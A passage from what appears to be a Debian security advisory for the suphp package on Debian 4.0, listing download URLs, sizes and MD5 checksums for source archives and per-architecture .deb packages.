to the proper configuration. Debian 4.0 (stable) - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc and s390. Source archives: http://security.debian.org/pool/updates/main/s/suphp/suphp_0.6.2-1+etch0.diff.gz Size/MD5 checksum:84478 1a1eede94aac39e7e7a2b6113c1ecc92 http://security.debian.org/pool/updates/main/s/suphp/suphp_0.6.2.orig.tar.gz Size/MD5 checksum: 372241 3ee72ad0198587b533045add6681c884 http://security.debian.org/pool/updates/main/s/suphp/suphp_0.6.2-1+etch0.dsc Size/MD5 checksum: 790 3aa0720205a32221eb52a981ddcdfd89 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/s/suphp/libapache-mod-suphp_0.6.2-1+etch0_alpha.deb Size/MD5 checksum:15648 b8fadf36126f8f6a33630370260e277f http://security.debian.org/pool/updates/main/s/suphp/suphp-common_0.6.2-1+etch0_alpha.deb Size/MD5 checksum:93420 cffd9423e55b7f4b4ddc332b7f039045 http://security.debian.org/pool/updates/main/s/suphp/libapache2-mod-suphp_0.6.2-1+etch0_alpha.deb Size/MD5 checksum:17640 3dadfc97bba8c09fc415fd36f08e0d80 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/s/suphp/libapache-mod-suphp_0.6.2-1+etch0_amd64.deb Size/MD5 checksum:15330 4d08416e7e914acdb6f26249de4d8aa6 http://security.debian.org/pool/updates/main/s/suphp/suphp-common_0.6.2-1+etch0_amd64.deb Size/MD5 checksum:83372 67e1aaacf2ab9fe93f3869465e0825c6 http://security.debian.org/pool/updates/main/s/suphp/libapache2-mod-suphp_0.6.2-1+etch0_amd64.deb Size/MD5 checksum:17214 580934d3a0ef003d62fe2baf2f0a58d8 arm architecture (ARM) http://security.debian.org/pool/updates/main/s/suphp/suphp-common_0.6.2-1+etch0_arm.deb Size/MD5 checksum:93974 4e5d85f6c81e3c838af9d394bb967d32 http://security.debian.org/pool/updates/main/s/suphp/libapache2-mod-suphp_0.6.2-1+etch0_arm.deb Size/MD5 checksum:16518 c59d80322cd3eb62b8e39623a20a665c http://security.debian.org/pool/updates/main/s/suphp/libapache-mod-suphp_0.6.2-1+etch0_arm.deb Size/MD5 checksum:14792 dbe97d39a6bfa069b1704c11d7230cf7 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/s/suphp/suphp-common_0.6.2-1+etch0_hppa.deb Size/MD5 checksum:92534 f0e9f893e92cc4ee3540096d1b719c22 http://security.debian.org/pool/updates/main/s/suphp/libapache-mod-suphp_0.6.2-1+etch0_hppa.deb Size/MD5 checksum:15940 79b30f1a14baf9feb9290513b16d079f http://security.debian.org/pool/updates/main/s/suphp/libapache2-mod-suphp_0.6.2-1+etch0_hppa.deb Size/MD5 checksum:18070 b46a68761c0bafbc5b4e05d5500ded75 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/s/suphp/libapache2-mod-suphp_0.6.2-1+etch0_i386.deb Size/MD5 checksum:16834 7f11e90a62d921b5db283f3ade65d726 http://security.debian.org/pool/updates/main/s/suphp/libapache-mod-suphp_0.6.2-1+etch0_i386.deb Size/MD5 checksum:15130 7728dd5ffa43ec81d94113b0511fa92b http://security.debian.org/pool/updates/main/s/suphp/suphp-common_0.6.2-1+etch0_i386.deb Size/MD5 checksum:82364 8c7696c278a9c9693ed3c46be3c087c3 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/s/suphp/libapache2-mod-suphp_0.6.2-1+etch0_ia64.deb Size/MD5 checksum:19814 5aa2a4f35444853a9aed5e428ac707b7 http://security.debian.org/pool/updates/main/s/suphp/libapache-mod-suphp_0.6.2-1+etch0_ia64.deb Size/MD5 checksum:17088 30455e4e07ccaea8f3fa246aaa4322eb